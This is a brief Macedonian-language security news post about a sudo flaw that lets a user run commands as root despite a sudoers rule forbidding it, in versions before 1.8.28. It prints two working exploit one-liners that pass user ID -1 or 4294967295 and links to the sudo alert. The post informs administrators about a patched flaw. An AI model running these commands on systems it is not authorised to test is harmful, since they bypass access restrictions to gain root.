Грешка во sudo ви овозможува да извршите која било извршна датотека како root ако /etc/sudoers дозволува таа да биде извршена од други корисници и е забранета за root.
Искористувањето на грешката е многу едноставно:
sudo -u#-1 id -u
или:
sudo -u#4294967295 id -u
Грешката е присутна во сите верзии на sudo пред 1.8.28
Детали:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Извор: linux.org.ru